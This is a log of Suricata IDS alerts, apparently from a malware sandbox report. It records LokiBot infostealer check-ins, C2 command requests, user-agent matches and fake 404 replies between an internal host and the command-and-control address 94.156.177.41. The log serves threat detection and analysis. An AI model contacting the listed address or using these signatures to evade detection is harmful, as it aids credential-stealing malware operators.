            Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:58516 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:58515 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:58514 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:58512 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:58518
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:58530 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:58508 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:58493 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49751 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:58511 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:58512 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:58511
            Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:58514
            Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:58530 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:58516
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:58572 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49763 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:58499
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49759 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49759 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:58512 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:58505
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:58559 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49751
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49763 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49758 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:58565 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:58572 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:58572 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:58572 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:58572 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:58559 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:58572
            Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:58512
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49763 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:58559 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49759
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49763 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49763 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:58565 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:58565 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:58588 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:58588 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:58588 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:58559 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:58493 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:58524 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:58524 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:58524 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:58515
            Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49763
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:58565 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:58489 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:58493 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:58493 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49758
            Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:58565 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:58501 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:58501 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49761 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:58530
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:58489 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:58489 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:58506 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:58489 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:58506 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:58588 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:58594 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:58506 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:58588 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:58501 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:58493
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:58623 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:58524 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:58524 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:58489 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:58559
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:58606 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:58623 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:58606 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:58606 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:58623 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:58501 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:58524
            Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:58501 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:58623 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:58543 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:58489
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:58650 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:58650 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:58508
            Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:58588
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:58635 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:58543 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:58623 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:58543 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:58565
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:58582 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:58664 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:58582 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:58582 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:58650 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:58635 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:58582 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:58506 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:58501
            Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:58506 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:58510 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:58510 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:58664 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:58510 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:58629 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49761 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49761 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:58629 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:58510 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49761 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:58629 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:58582 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:58600 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:58600 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:58600 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:58650 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:58664 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:58613 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:58543 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:58695 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:58695 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:58629 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:58600 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:58600 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:58683 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:58683 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:58497 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:58553 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:58553 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:58594 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:58695 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:58510 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:58623
            Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:58506
            Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:58510
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:58695 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:58695 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49761 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:58664 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:58664 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:58635 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:58695
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:58497 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49756 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:58675 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:58664
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:58675 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:58613 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:58553 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:58675 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:58594 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:58543 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:58701 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:58635 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:58635 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49761
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:58553 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:58683 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:58675 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49756 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:58536 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:58536 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:58536 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:58675 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:58613 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:58594 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:58594 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:58536 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:58553 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:58536 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:58497 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:58708 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:58708 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:58606 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:58708 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:58606 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:58495 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:58495 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:58495 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:58543
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:58701 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:58701 -> 94.156.177.41:80
